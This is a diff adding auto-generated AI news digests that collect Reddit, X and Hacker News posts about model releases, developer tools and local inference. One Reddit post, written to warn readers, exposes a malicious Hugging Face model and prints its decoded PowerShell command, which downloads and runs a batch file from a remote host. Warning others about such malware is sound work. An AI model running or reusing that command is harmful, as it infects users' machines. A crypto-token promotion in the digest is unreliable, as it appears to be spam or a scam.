SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before.
The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope… + +--- + +## [Local Dream 2.4.3 - SDXL support, tag autocomplete and more](https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/) +*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \- Tag autocomplete from CSV import \- Token counter for prompts \- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases) + +--- + +## [Building a 9-ball AI player: Candidate generation for direct cut shots [P]](https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/) +*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. 
Which shot you should choose depends on the probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use the pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la… + +--- + +## [Parax v0.5: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/) +*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for "parametric modeling" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extendable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach.
Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary + +--- + +## [AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]](https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/) +*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. 
The honest caveat from the author: this uses four reference projects and… + +--- + +## ["FLUX Creator Program" - New Flux models sooner than expected?](https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: open_source + +> are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post + +--- + +## [Best Open Source models for running on Gaming PC or Mac mini M4](https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/) +*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 +Tags: open_source + +> I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you! + +--- + +## [OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…](https://x.com/H_Mhatre_/status/2051715305890521578) +*X / @h_mhatre_* | 05/05/2026 | Score: 1.00 +Tags: tool_update + +> OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. 
$MSFT + +--- + diff --git a/data/digest-2026-05-06.md b/data/digest-2026-05-06.md new file mode 100644 index 0000000..c561332 --- /dev/null +++ b/data/digest-2026-05-06.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-06** | 15 stories | Auto-generated from 542 archived stories + +--- + +## [[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)](https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\_KVEdit\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. 
You will al… + +--- + +## [OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI](https://x.com/Reeperr131/status/2052074977973694608) +*X search / Agent workflows* | 06/05/2026 | Score: 1.00 +Tags: api_update, cli_tool, tool_update + +> OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI + +--- + +## [CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI](https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> Even with agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. 
Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit) + +--- + +## [2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints](https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: api_update, product_launch, agent_tool + +> > **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. 
You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo… + +--- + +## [Getting error "command 'claude-vscode.editor.openLast' not found", but not like anyone has talked about.](https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/) +*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, cli_tool + +> I've read many posts and github pages about this exact issue, but mine is different. It's not just that error. Any anthropic claude code command from logout to open in sidebar results in the error "Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found". I have tried to diagnose and fix the issue and it's not working. Here is what is not working: 1. Claude sidebar not working 2. No claude commands from command palette working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string.
Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\Users\___\.vscode\extensions\anthropic.claude-code-2.1.129-win32-x64\extension.js:102:… + +--- + +## [UniReasoner: Using LLMs as "Universal Reasoners" to Fix Prompt Alignment](https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: product_launch, developer_tool + +> A new paper titled Large Language Models are Universal Reasoners for Visual Generation introduces UniReasoner, a framework designed to close the "understanding-generation gap" in text-to-image models. The core observation is that while unified multimodal models often fail to follow complex prompts during generation (e.g., getting counts or spatial relations wrong), the exact same model is usually excellent at verifying those mistakes when looking at the resulting image. Current models like BAGEL might generate five apples when asked for four. However, if you ask that same model to count the apples in its own generated image, it correctly identifies there are five. This suggests that the model's "understanding" capacity is much stronger than its "generative" capacity. UniReasoner converts this verification strength into direct guidance for the diffusion process using a three-stage pipeline: 1. The LLM generates a coarse visual draft using discrete vision tokens. This acts as a spatial and semantic plan for the scene. 2. The same LLM evaluates its draft against the original prompt. 
It produces a "grounded evaluation" in text, pinpointing exactly what is wrong (e.g., "Missing a bicyc… + +--- + +## [Followup to the kanban for Claude Code - now vibeyard's home screen is a yard I build myself](https://reddit.com/r/ClaudeAI/comments/1t5og8l/followup_to_the_kanban_for_claude_code_now/) +*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Even with the kanban, I still opened 3 tabs every morning - PRs in GitHub, tasks on the board, half-finished sessions in the terminal - just to figure out what to work on. So I made the home screen of **Vibeyard** (open-source, MIT) a yard you build yourself. Drop in widgets - open PRs, issues, AI readiness, active sessions, kanban, team - arrange them however you want. **Click any card → it spawns a Claude session scoped to it. A PR opens a review session. An issue opens a plan-the-fix session. A stale session resumes where you left off.** (Followup to my last post: https://www.reddit.com/r/ClaudeAI/comments/1sye8bs/) GitHub: [https://github.com/elirantutia/vibeyard](https://github.com/elirantutia/vibeyard) **Contributions and feedback are welcome!** + +--- + +## [Internal tools with no MCP](https://reddit.com/r/ClaudeAI/comments/1t5ah5r/internal_tools_with_no_mcp/) +*Reddit r/ClaudeAI* | 06/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> We have several internal systems that all have robust APIs. Some are internet facing and some are not. None of them have MCP servers available for them. I'm trying to figure out the best way to connect Claude Enterprise to these systems via API to pull the data we need from them with MCP.
+ +--- + +## [Show HN: Adam – An embeddable cross-platform AI agent library](https://github.com/sqliteai/adam) +*Hacker News* | 06/05/2026 | Score: 0.96 +Tags: developer_tool, agent_tool + +--- + +## [The GB10 Solution Atlas is now open source, the inference engine made for the community with breakneck inference speeds (Qwen3.6-35B-FP8 100+ tok/s)](https://reddit.com/r/LocalLLaMA/comments/1t5p2yv/the_gb10_solution_atlas_is_now_open_source_the/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: open_source + +> Some of you saw our post a couple weeks back about hitting 102 tok/s stable on Qwen3.5-35B on a DGX Spark. A lot of you asked "cool, where's the code?" Today's the day: [Github](https://github.com/Avarok-Cybersecurity/atlas) **Atlas is open source.** Pure Rust + CUDA, no PyTorch, no Python runtime, \~2.5 GB image, <2 minute cold start. We rewrote the whole stack from HTTP handler to kernel dispatch because the bottleneck on Spark wasn't the silicon, it was 20+ GB of generic Python machinery sitting between your prompt and the GPU. We need community support to keep elevating Atlas **for developers**. **Numbers on a single DGX Spark (GB10):** Qwen3.5-35B (NVFP4, MTP K=2): 130 tok/s peak, \~111 tok/s sustained → 3.0–3.3x vLLM at testing time Qwen3.5-122B (NVFP4, EP=2): \~50 tok/s decode Qwen3-Next-80B-A3B (NVFP4, MTP): \~87 tok/s Nemotron-3 Nano 30B (FP8): \~88 tok/s Full model matrix on the site (Minimax2.7, Qwen3.6, Gemma too!) **What's actually different:** Hand-tuned CUDA kernels for Blackwell SM120/121 meaning attention, MoE, GDN, Mamba-2. No generic fallbacks. Native NVFP4 + FP8 on tensor cores MTP (Multi-Token Prediction) speculative decoding for up to 3x throughput on deco… + +--- + +## [Anyone else tried this RefineAnything LoRA? 
Pretty impressed so far](https://reddit.com/r/StableDiffusion/comments/1t5n9nz/anyone_else_tried_this_refineanything_lora_pretty/) +*Reddit r/StableDiffusion* | 06/05/2026 | Score: 1.00 +Tags: developer_tool + +> Been messing around with the RefineAnything project for the past few days and honestly the results are kinda wild for local detail fixes. Figured I'd share in case anyone else is into this stuff. Quick rundown of what it does: you give it an image + a region (scribble mask or bounding box), and it cleans up just that area — text, logos, product labels, thin lines, that kind of thing. The rest of the image stays untouched. Works with or without a reference image too. Original project: [https://github.com/limuloo/RefineAnything](https://github.com/limuloo/RefineAnything) While I was testing it I got tired of doing the mask prep, reference alignment, and paste-back manually every time, so I built a little ComfyUI plugin to handle all that. Just wanted to be clear though — **the plugin isn't tied to this specific LoRA at all**. It's totally model-agnostic, so it should work fine for pretty much any local detail repair workflow you're already running. RefineAnything just happens to be what I tested it with, and my test workflow is included in the plugin repo if you want to try it. Plugin: [https://github.com/1Kynx/ComfyUI-RefineNode](https://github.com/1Kynx/ComfyUI-RefineNode) Where I… + +--- + +## [I analyzed 922 agentic task trace and found the secret weapon of DeepSeek v4](https://reddit.com/r/LocalLLaMA/comments/1t5lywi/i_analyzed_922_agentic_task_trace_and_found_the/) +*Reddit r/LocalLLaMA* | 06/05/2026 | Score: 1.00 +Tags: open_source + +> I recently did a benchmark of deepseek v4 in agentic tasks. Performance-wise, it's one of the best open source models, as expected. What really surprised me is the cost. I mean I know it's cheap, but it's cheap in a way that doesn't really make sense. 
# Cost Estimation Let's take v4 flash as example since it's not on sale (so it can better reflect the actual provider cost). [deepseek v4 flash price on openrouter](https://preview.redd.it/vh4qfgn6zjzg1.png?width=562&format=png&auto=webp&s=8df0fae84b5b5840efdc87e50ef2db6a5fc23134) [opus 4.7 price on openrouter](https://preview.redd.it/c7qumr2u0kzg1.png?width=533&format=png&auto=webp&s=31101fb42a75d2ba33169c570c61e4297c28901b) Looking at OpenRouter price, deepseek v4 flash price is about 0.03x opus 4.7 price. (We only look at input token price because in long agentic task, input token is the dominant cost.) So if v4 flash uses similar amount of token in a task as opus 4.7, the actual cost should be somewhere around 0.03x compared to using opus. # Actual Data Then I ran the benchmark, long agentic tasks running in openclaw (which uses PI for agent loop), openrouter as model provider. The actual cost data blew my… + +--- + +## [the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one pai…](https://x.com/NovaByArun/status/2052077319960047791) +*X search / AI vibes* | 06/05/2026 | Score: 1.00 +Tags: tool_update + +> the most boring saas on the internet: packager. automates software deployment for it admins via microsoft intune. launched free on reddit. moved to $25/mo after refinement. $60k/mo today. not "ai productivity copilot for everyone." one painful workflow. one credible audience. + +--- + +## [Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! 
Check https:// OKAI.HK/ALpha](https://x.com/AzaleasWatkin/status/2052075760354238868) +*X search / Agent workflows* | 06/05/2026 | Score: 1.00 +Tags: mcp + +> Update DEXScreener ⊢Token⎼ BULULULUP ⊢CA⎼ BRzMym3YfDJ3NpuP9QmXDUMeh3wguYZqWZd2Lo4Ry7oA ⊢MCP⎼ 20.4K Unleash Your Inner Glow with BULULULUP! Check https:// OKAI.HK/ALpha + +--- + +## [I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic?](https://x.com/MichaelAzmy/status/2052075579424334002) +*X search / AI model updates* | 06/05/2026 | Score: 1.00 +Tags: product_launch + +> I can't keep with Claude releases anymore.. how many AI agents are actually shipping all these e2e features at Anthropic? + +--- + diff --git a/data/digest-2026-05-07.md b/data/digest-2026-05-07.md new file mode 100644 index 0000000..000df5c --- /dev/null +++ b/data/digest-2026-05-07.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-07** | 15 stories | Auto-generated from 548 archived stories + +--- + +## [I embedded an AI agent in my shell. It can now run interactive programs.](https://reddit.com/r/LocalLLaMA/comments/1t6nuhz/i_embedded_an_ai_agent_in_my_shell_it_can_now_run/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: product_launch, open_source, developer_tool, cli_tool, agent_tool + +> I want to share a fun side project of mine over the past month or so where I tried to build a shell with an AI agent embedded. The embedded agent knows everything happening in the shell so I don't have to keep copy-and-pasting error messages to another coding agent while working in a terminal. Now it has grown into a useful tool in my daily workflow and a fun playground for agent experiments. Here I'm showing a new extension I'm building that launches an agent on a floating overlay that can read my terminal and type out commands for me, which I thought was really cool. 
I can already see lots of application of this idea such as helping me with interactive installation or helping me over an ssh session without remote installation. The project is fully [open source](https://github.com/guanyilun/agent-sh) with mit license, feel free to try it out and build on it. It should support local models as well as cloud models. This overlay feature is an experimental extension that only exists in the example folder. You can point your coding agent to the docs to help you set it up should you want to try it out (be sure to grab both the overlay-agent extension for the floating display and the te… + +--- + +## [I just tried Reactor's open source world model demo, here are my thoughts](https://reddit.com/r/StableDiffusion/comments/1t6qfff/i_just_tried_reactors_open_source_world_model/) +*Reddit r/StableDiffusion* | 08/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool + +> So I recently stumbled upon Reactor's new demo of an open source world model. AFAIK they are not training the models themselves, but they are the infra that powers them and will be offering them via SDK, which will be super interesting to see once this is available via API since so far they've been just text-to-video demos. Having tried it extensively, some of my thoughts: * The models are getting very good very fast * This can massively impact industries such as robotics * I am impressed at the visual fidelity of the model * We are still a few years away from anything gaming-related Would love to hear what you all think! + +--- + +## [My Claude dreams at night and remembers everything. Better than mempalace.](https://reddit.com/r/ClaudeAI/comments/1t5yhio/my_claude_dreams_at_night_and_remembers/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: mcp, open_source, tool_update + +> Back in January I got tired of the same thing everyone complains about now you start a new session with Claude and it has no idea who you are. Every time. From scratch. 
So I built iai-mcp. A local daemon that captures every conversation, organizes it into three memory tiers, and feeds the right context back when you start a new session. No "remember this." No copy-pasting from old chats. It just knows. I've been using it daily with Claude Code since January. Five months. At this point it knows my coding style, my project structures, my preferences things I never explicitly told it to save. It picked them up from conversation and held onto them. It stores everything verbatim, runs neural embeddings locally, encrypts at rest with AES-256, consolidates memory in the background while your machine is idle, and ships every benchmark harness so you can verify the numbers yourself. Verbatim recall above 99%. Retrieval under 100ms. Session-start cost under 3,000 tokens. I didn't release it because I was building it for myself. It worked, so I kept using it. But watching the space blow up made me realize maybe other people want this too. So here it is. Open source. MIT licensed. Five months… + +--- + +## [Claude Code: the only CLI where scrolling up is a premium feature](https://reddit.com/r/ClaudeAI/comments/1t6fwhx/claude_code_the_only_cli_where_scrolling_up_is_a/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> Love Claude Code. Genuinely. It's changed how I work. But can we talk about how in 2026, a $200/month AI coding tool can't do what echo "hello world" has done since 1971? If Claude writes more than one screenful of text — which it does approximately always — you scroll up and get... nothing. A beautiful void. Your conversation is gone. It existed briefly, like a Snapchat from your AI pair programmer. This has been reported across at least half a dozen GitHub issues going back months. The "workarounds": \- Ctrl+O transcript mode — congrats, you can now read your conversation history, but Claude is frozen while you do. 
It's like being told "you can look at your notes, but only if you stop the meeting." \- iTerm2's "Save lines to scrollback" setting — tried it. Same blank screen. Maybe my iTerm is also frustrated. \- Open in editor with v — so the workflow is: ask Claude a question, read the first half on screen, press Ctrl+O, press v, open vim, scroll to where you were, read the rest, quit vim, go back to Claude. Productivity! The root cause is apparently the alternate screen buffer from the Ink framework. I get it, architectural decisions are hard. But this is the equivalent of shi… + +--- + +## [why llama.cpp can’t combine speculative decode methods?](https://reddit.com/r/LocalLLaMA/comments/1t63snn/why_llamacpp_cant_combine_speculative_decode/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> dicking around with the new mtp speculative decode with qwen3.6 27b, and it’s great. but for agentic coding i’ve seen significant improvements from ngram, because a decent fraction of the time (e.g. calling edit tool) the model is just repeating verbatim a section of code that it has already seen before. ngram can speculate on a lot of tokens reeaallly fast in comparison. it’d be great if we could combine them by using them both at the same time, but it looks like if i add them both to the command line arguments, only ngram is active. is there any reason both can’t be used simultaneously? fundamental limitation, or just an implementation limit with a fix on the horizon? EDIT: just looked at the PR again and PmNz8 asked the same question like two hours before i posted this. go give it an updoot! 
[https://github.com/ggml-org/llama.cpp/pull/22673#issuecomment-4394544777](https://github.com/ggml-org/llama.cpp/pull/22673) + +--- + +## [ClaudePlaysPokemon Opus 4.7 run ongoing!](https://reddit.com/r/ClaudeAI/comments/1t5y6gc/claudeplayspokemon_opus_47_run_ongoing/) +*Reddit r/ClaudeAI* | 07/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> Currently streaming at: [https://www.twitch.tv/claudeplayspokemon](https://www.twitch.tv/claudeplayspokemon) This is a passion project by David Hershey, an Anthropic employee on the Applied AI team. He started it in June 2024 to learn agent development, posted updates to an internal Slack, coworkers got hooked, went public when Sonnet 3.7 launched in Feb 2025. Anthropic doesn't own it but promotes it and subsidizes the API costs since Claude is their model. Claude is playing Pokemon Red on a Game Boy emulator, the unmodified 1996 game (with a fan-made full color patch applied so the model can see the screen better). No human input, no walkthrough access, no game knowledge fed in. The system prompt actually tells Claude to distrust its own Pokemon knowledge since the game version may differ from what it knows. It gets a screenshot, a few tools, and md notes files. That's it. The current run is on Opus 4.7, the new flagship that came out three weeks ago. **5 of 8 badges at 15,779 steps**, party led by Ivy the Venusaur at Lv 62 with the rest of the team in the teens (classic overleveled-starter playthrough). For context, Opus 4.5 was at 48,000 steps and still stuck in Silph Co at the… + +--- + +## [Image Generation Quality Mode is now available on the xAI API. This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business pr…](https://x.com/xai/status/2052193877675983031) +*X / @xai* | 07/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Image Generation Quality Mode is now available on the xAI API. 
This model has already powered the generation of over 300 million images on Grok. It brings higher realism, stronger text rendering, and better creative control for business professionals. + +--- + +## [[Open] useknockout - free SOTA background removal + super-res API alternative to remove.bg / Topaz, MIT, runs on Modal](https://reddit.com/r/LocalLLaMA/comments/1t5v7uh/open_useknockout_free_sota_background_removal/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> Released v0.6.0 of useknockout this week. Single FastAPI service, 20 endpoints deploys to Modal in one command. **Endpoints** \- /remove (BiRefNet + pymatting matting refinement) \- /upscale (Swin2SR or Real-ESRGAN, x2/x4) \- /face-restore (GFPGAN v1.4) \- /replace-bg, /remove-batch, /remove-url All weights baked into the Docker image. Self-host on any GPU box, or use the free hosted endpoint and playground at [useknockout.com](http://useknockout.com) (FREE while in Beta) **SDKs all MIT too:** \- /useknockout/node \- /useknockout/react \- /useknockout/cli \- useknockout (PyPI) Repo: [https://github.com/useknockout/api](https://github.com/useknockout/api) Signup: [www.useknockout.com](http://www.useknockout.com) If you want to add something, PRs welcome - issues open for /colorize next and please feel free to give me yor input! would be greatly appreciated! 
+ +--- + +## [How I made $350K from an open-source JavaScript library using dual licensing](https://www.paritydeals.com/blog/monetize-open-source-dual-licensing/) +*Hacker News* | 07/05/2026 | Score: 0.94 +Tags: open_source, developer_tool + +--- + +## [11.67% ARC-AGI-2 Local Eval on a Single 4090: The TOPAS Recursive Architecture](https://reddit.com/r/LocalLLaMA/comments/1t6n97x/1167_arcagi2_local_eval_on_a_single_4090_the/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: open_source + +> I'm not sure too many people care about the ARC-AGI-2 competition anymore, but still...I thought some might find this interesting. They're running it one last time this year. Everyone is currently leaderboard-stuffing using the winning open-source code from last year. That's why if you take a peak it's really just the same scores clogging it up. We're doing something a bit different though, building a highly efficient, deep-recursion model from scratch. We just hit 11.67% on the public LB, but that's with a massive asterisk. We don't have a cluster. We have **one RTX 4090**. And we're only 14 days or so into training a 100m parameter model. Locally, this checkpoint actually hit 36%. On the Kaggle submission, our TTT is computationally heavy because of the recursive loops. To avoid a total submission timeout, we set the thresholds too high, and the model ended up outputting \[\] (null) for nearly half the puzzles...hence the 11.67%. We're trying to show that ARC isn't just a Compute War, but an architecture war. Small models using biological memory models can punch way above their weight class if they can handle the reasoning loops. We're tuning the time-management logic tonight an… + +--- + +## [[SCAM DO NOT USE!!] OpenOSS/privacy-filter](https://reddit.com/r/LocalLLaMA/comments/1t6j63p/scam_do_not_use_openossprivacyfilter/) +*Reddit r/LocalLLaMA* | 07/05/2026 | Score: 1.00 +Tags: api_update + +> Hey there! 
I am about to heavily warn you from [https://huggingface.co/Open-OSS/privacy-filter/](https://huggingface.co/Open-OSS/privacy-filter/) This model is SCAM and downloads MALWARE to your computer!!! Look at [https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py](https://huggingface.co/Open-OSS/privacy-filter/blob/main/loader.py) If you decode that base64 string (aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0FWTk5F) an URL comes out: [https://jsonkeeper.com/b/AVNNE](https://jsonkeeper.com/b/AVNNE) Which contains: { "cmd": "\[Net.ServicePointManager\]::SecurityProtocol=\[Net.SecurityProtocolType\]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o" } This is sooo critical! This fake model downloads an EXE and a bat file to your computer! PLEASE: be careful not to use it. The real model is here: [https://huggingface.co/openai/privacy-filter](https://huggingface.co/openai/privacy-filter) Thanks for your attention! + +--- + +## [I trained a NER model on 33,000 Indian Supreme Court judgments (1950–2024) CASE_CITATION hits 97.76% F1, +17 points over the only prior baseline [P]](https://reddit.com/r/MachineLearning/comments/1t6iax2/i_trained_a_ner_model_on_33000_indian_supreme/) +*Reddit r/MachineLearning* | 07/05/2026 | Score: 1.00 +Tags: open_source + +> **TL;DR**: Released en\_legal\_ner\_ind\_trf v0.1 - InLegalBERT fine-tuned on \~34,700 silver-annotated chunks from 33k Indian SC judgments. 13 labels. 78.67% overall F1. CASE\_CITATION at 97.76% already exceeds OpenNyAI's PRECEDENT score by +17 points. Free, Apache-2.0. **Why this exists** OpenNyAI is the only prior Indian legal NER model 